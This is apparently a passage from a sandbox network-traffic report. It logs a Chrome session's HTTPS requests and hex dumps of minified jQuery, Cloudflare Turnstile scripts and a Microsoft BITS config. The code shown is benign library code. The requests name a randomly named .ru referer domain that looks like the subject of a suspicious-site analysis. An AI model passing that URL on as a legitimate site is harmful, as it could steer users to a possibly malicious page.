                                                Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                2024-05-30 10:20:44 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                2024-05-30 10:20:44 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                2024-05-30 10:20:44 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                2024-05-30 10:20:44 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                                2024-05-30 10:20:44 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                                Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                2024-05-30 10:20:44 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                2024-05-30 10:20:44 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                6192.168.2.449747104.17.2.1844434956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-30 10:20:44 UTC649OUTGET /turnstile/v0/api.js?render=explicit HTTP/1.1
                                                Host: challenges.cloudflare.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                sec-ch-ua-platform: "Windows"
                                                Accept: */*
                                                Sec-Fetch-Site: cross-site
                                                Sec-Fetch-Mode: no-cors
                                                Sec-Fetch-Dest: script
                                                Referer: https://f8gxf.oritelos.ru/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-05-30 10:20:44 UTC336INHTTP/1.1 302 Found
                                                Date: Thu, 30 May 2024 10:20:44 GMT
                                                Content-Length: 0
                                                Connection: close
                                                location: /turnstile/v0/b/695da7821231/api.js
                                                cache-control: max-age=300, public
                                                cross-origin-resource-policy: cross-origin
                                                access-control-allow-origin: *
                                                Server: cloudflare
                                                CF-RAY: 88bdfe4848acc331-EWR
                                                alt-svc: h3=":443"; ma=86400


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                7192.168.2.449748184.28.90.27443
                                                TimestampBytes transferredDirectionData
                                                2024-05-30 10:20:44 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept: */*
                                                Accept-Encoding: identity
                                                If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                Range: bytes=0-2147483646
                                                User-Agent: Microsoft BITS/7.8
                                                Host: fs.microsoft.com
                                                2024-05-30 10:20:44 UTC515INHTTP/1.1 200 OK
                                                ApiVersion: Distribute 1.1
                                                Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                Content-Type: application/octet-stream
                                                ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                Server: ECAcc (lpl/EF06)
                                                X-CID: 11
                                                X-Ms-ApiVersion: Distribute 1.2
                                                X-Ms-Region: prod-weu-z1
                                                Cache-Control: public, max-age=193797
                                                Date: Thu, 30 May 2024 10:20:44 GMT
                                                Content-Length: 55
                                                Connection: close
                                                X-CID: 2
                                                2024-05-30 10:20:44 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                8192.168.2.449749104.17.2.1844434956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-30 10:20:44 UTC648OUTGET /turnstile/v0/b/695da7821231/api.js HTTP/1.1
                                                Host: challenges.cloudflare.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                sec-ch-ua-platform: "Windows"
                                                Accept: */*
                                                Sec-Fetch-Site: cross-site
                                                Sec-Fetch-Mode: no-cors
                                                Sec-Fetch-Dest: script
                                                Referer: https://f8gxf.oritelos.ru/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-05-30 10:20:44 UTC346INHTTP/1.1 200 OK
                                                Date: Thu, 30 May 2024 10:20:44 GMT
                                                Content-Type: application/javascript; charset=UTF-8
                                                Content-Length: 42527
                                                Connection: close
                                                cache-control: max-age=604800, public
                                                cross-origin-resource-policy: cross-origin
                                                access-control-allow-origin: *
                                                Server: cloudflare
                                                CF-RAY: 88bdfe4c6bc10cc4-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                2024-05-30 10:20:44 UTC1023INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 45 74 28 65 2c 61 2c 72 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 62 3d 65 5b 75 5d 28 67 29 2c 5f 3d 62 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 73 29 7b 72 28 73 29 3b 72 65 74 75 72 6e 7d 62 2e 64 6f 6e 65 3f 61 28 5f 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 5f 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 77 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 74 68 69 73 2c 72 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 61 2c 72 29 3b 66 75 6e 63 74
                                                Data Ascii: "use strict";(function(){function Et(e,a,r,o,c,u,g){try{var b=e[u](g),_=b.value}catch(s){r(s);return}b.done?a(_):Promise.resolve(_).then(o,c)}function wt(e){return function(){var a=this,r=arguments;return new Promise(function(o,c){var u=e.apply(a,r);funct
                                                2024-05-30 10:20:44 UTC1369INData Raw: 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 72 2e 70 75 73 68 2e 61 70 70 6c 79 28 72 2c 6f 29 7d 72 65 74 75 72 6e 20 72 7d 66 75 6e 63 74 69 6f 6e 20 54 74 28 65 2c 61 29 7b 72 65 74 75 72 6e 20 61 3d 61 21 3d 6e 75 6c 6c 3f 61 3a 7b 7d 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 28 65 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 28 61 29 29 3a 64 72 28 4f 62 6a 65 63 74 28 61 29 29 2e 66 6f 72 45 61 63 68
                                                Data Ascii: r(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),r.push.apply(r,o)}return r}function Tt(e,a){return a=a!=null?a:{},Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(a)):dr(Object(a)).forEach
                                                2024-05-30 10:20:44 UTC1369INData Raw: 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 43 65 28 65 2c 61 29 7b 76 61 72 20 72 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30 5d 26 31 29 74 68 72 6f 77 20 75 5b 31 5d 3b 72 65 74 75 72 6e 20 75 5b 31 5d 7d 2c 74 72 79 73 3a 5b 5d 2c 6f 70 73 3a 5b 5d 7d 2c 6f 2c 63 2c 75 2c 67 3b 72 65 74 75 72 6e 20 67 3d 7b 6e 65 78 74 3a 62 28 30 29 2c 74 68 72 6f 77 3a 62 28 31 29 2c 72 65 74 75 72 6e 3a 62 28 32 29 7d 2c 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 28 67
                                                Data Ascii: urn e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ce(e,a){var r={label:0,sent:function(){if(u[0]&1)throw u[1];return u[1]},trys:[],ops:[]},o,c,u,g;return g={next:b(0),throw:b(1),return:b(2)},typeof Symbol=="function"&&(g
                                                2024-05-30 10:20:44 UTC1369INData Raw: 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 43 74 3d 33 30 30 30 32 30 3b 76 61 72 20 4e 65 3d 33 30 30 30 33 30 3b 76 61 72 20 55 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4d 41 4e 41 47 45 44 3d 22 6d 61 6e 61 67 65 64 22 2c 65 2e 4e 4f 4e 5f 49 4e 54 45 52 41 43 54 49 56 45 3d 22 6e 6f 6e 2d 69 6e 74 65 72 61 63 74 69 76 65 22 2c 65 2e 49 4e 56 49 53 49 42 4c 45 3d 22 69 6e 76 69 73 69 62 6c 65 22 7d 29 28 55 7c 7c 28 55 3d 7b 7d 29 29 3b 76 61 72 20 56 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 4f 52 4d 41 4c 3d 22 6e 6f 72 6d 61 6c 22
                                                Data Ascii: ked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Ct=300020;var Ne=300030;var U;(function(e){e.MANAGED="managed",e.NON_INTERACTIVE="non-interactive",e.INVISIBLE="invisible"})(U||(U={}));var V;(function(e){e.NORMAL="normal"
                                                2024-05-30 10:20:44 UTC1369INData Raw: 74 72 69 6e 67 22 26 26 76 72 2e 74 65 73 74 28 65 29 7d 76 61 72 20 6d 72 3d 2f 5e 5b 61 2d 7a 30 2d 39 5f 5c 2d 3d 5d 7b 30 2c 32 35 35 7d 24 2f 69 3b 66 75 6e 63 74 69 6f 6e 20 5a 65 28 65 29 7b 72 65 74 75 72 6e 20 65 3d 3d 3d 76 6f 69 64 20 30 3f 21 30 3a 74 79 70 65 6f 66 20 65 3d 3d 22 73 74 72 69 6e 67 22 26 26 6d 72 2e 74 65 73 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 65 74 28 65 29 7b 72 65 74 75 72 6e 20 4e 28 5b 22 6e 6f 72 6d 61 6c 22 2c 22 63 6f 6d 70 61 63 74 22 2c 22 69 6e 76 69 73 69 62 6c 65 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 74 74 28 65 29 7b 72 65 74 75 72 6e 20 4e 28 5b 22 61 75 74 6f 22 2c 22 6d 61 6e 75 61 6c 22 2c 22 6e 65 76 65 72 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 72 74 28 65 29 7b 72 65 74 75 72 6e 20 4e 28
                                                Data Ascii: tring"&&vr.test(e)}var mr=/^[a-z0-9_\-=]{0,255}$/i;function Ze(e){return e===void 0?!0:typeof e=="string"&&mr.test(e)}function et(e){return N(["normal","compact","invisible"],e)}function tt(e){return N(["auto","manual","never"],e)}function rt(e){return N(
                                                2024-05-30 10:20:44 UTC1369INData Raw: 74 75 72 6e 73 74 69 6c 65 2f 69 66 2f 6f 76 32 2f 61 76 30 2f 72 63 76 22 29 2e 63 6f 6e 63 61 74 28 6f 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 61 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 72 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 72 2e 73 69 7a 65 29 2e 63 6f 6e 63 61 74 28 73 29 7d 66 75 6e 63 74 69 6f 6e 20 4c 65 28 65 29 7b 69 66 28 65 3d 3d 3d 76 6f 69 64 20 30 29 74 68 72 6f 77 20 6e 65 77 20 52 65 66 65 72 65 6e 63 65 45 72 72 6f 72 28 22 74 68 69 73 20 68 61 73 6e 27 74 20 62 65 65 6e 20 69 6e 69 74 69 61 6c 69 73 65 64 20 2d 20 73 75 70 65 72 28 29 20 68 61 73 6e 27 74 20 62 65 65 6e 20 63 61 6c 6c 65 64 22 29 3b 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 71 74 28 65 2c 61 29 7b
                                                Data Ascii: turnstile/if/ov2/av0/rcv").concat(o,"/").concat(e,"/").concat(a,"/").concat(r.theme,"/").concat(r.size).concat(s)}function Le(e){if(e===void 0)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return e}function qt(e,a){
                                                2024-05-30 10:20:44 UTC1369INData Raw: 69 6f 6e 28 6f 29 7b 69 66 28 6f 3d 3d 3d 6e 75 6c 6c 7c 7c 21 47 74 28 6f 29 29 72 65 74 75 72 6e 20 6f 3b 69 66 28 74 79 70 65 6f 66 20 6f 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 53 75 70 65 72 20 65 78 70 72 65 73 73 69 6f 6e 20 6d 75 73 74 20 65 69 74 68 65 72 20 62 65 20 6e 75 6c 6c 20 6f 72 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 3b 69 66 28 74 79 70 65 6f 66 20 61 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 29 7b 69 66 28 61 2e 68 61 73 28 6f 29 29 72 65 74 75 72 6e 20 61 2e 67 65 74 28 6f 29 3b 61 2e 73 65 74 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 72 65 74 75 72 6e 20 62 65 28 6f 2c 61 72 67 75 6d 65 6e 74 73 2c 74 65 28 74 68 69 73 29 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29
                                                Data Ascii: ion(o){if(o===null||!Gt(o))return o;if(typeof o!="function")throw new TypeError("Super expression must either be null or a function");if(typeof a!="undefined"){if(a.has(o))return a.get(o);a.set(o,c)}function c(){return be(o,arguments,te(this).constructor)
                                                2024-05-30 10:20:44 UTC1369INData Raw: 54 75 72 6e 73 74 69 6c 65 20 73 63 72 69 70 74 20 74 61 67 2c 20 73 6f 6d 65 20 66 65 61 74 75 72 65 73 20 6d 61 79 20 6e 6f 74 20 62 65 20 61 76 61 69 6c 61 62 6c 65 22 2c 34 33 37 37 37 29 3b 76 61 72 20 61 3d 7b 6c 6f 61 64 65 64 41 73 79 6e 63 3a 21 31 2c 70 61 72 61 6d 73 3a 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 7d 3b 28 65 2e 61 73 79 6e 63 7c 7c 65 2e 64 65 66 65 72 29 26 26 28 61 2e 6c 6f 61 64 65 64 41 73 79 6e 63 3d 21 30 29 3b 76 61 72 20 72 3d 65 2e 73 72 63 2c 6f 3d 72 2e 73 70 6c 69 74 28 22 3f 22 29 3b 72 65 74 75 72 6e 20 6f 2e 6c 65 6e 67 74 68 3e 31 26 26 28 61 2e 70 61 72 61 6d 73 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 28 6f 5b 31 5d 29 29 2c 61 7d 66 75 6e 63 74 69 6f 6e 20 44 28 29 7b 72 65 74
                                                Data Ascii: Turnstile script tag, some features may not be available",43777);var a={loadedAsync:!1,params:new URLSearchParams};(e.async||e.defer)&&(a.loadedAsync=!0);var r=e.src,o=r.split("?");return o.length>1&&(a.params=new URLSearchParams(o[1])),a}function D(){ret
                                                2024-05-30 10:20:44 UTC1369INData Raw: 22 2c 68 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 61 62 73 6f 6c 75 74 65 22 2c 68 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 32 30 22 2c 68 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 57 69 64 74 68 3d 22 31 70 78 22 2c 68 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 43 6f 6c 6f 72 3d 22 23 30 30 30 22 2c 68 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 53 74 79 6c 65 3d 22 73 6f 6c 69 64 22 2c 68 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3d 22 23 66 66 66 66 66 66 22 2c 68 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 52 61 64 69 75 73 3d 22 31 30 70 78 22 2c 68 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 2d 31 32 32 70 78 22 2c 68 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 2d 39 31 70 78 22 2c 68 2e 73 74 79 6c 65 2e 6f 76 65
                                                Data Ascii: ",h.style.position="absolute",h.style.zIndex="21474836420",h.style.borderWidth="1px",h.style.borderColor="#000",h.style.borderStyle="solid",h.style.backgroundColor="#ffffff",h.style.borderRadius="10px",h.style.left="-122px",h.style.top="-91px",h.style.ove
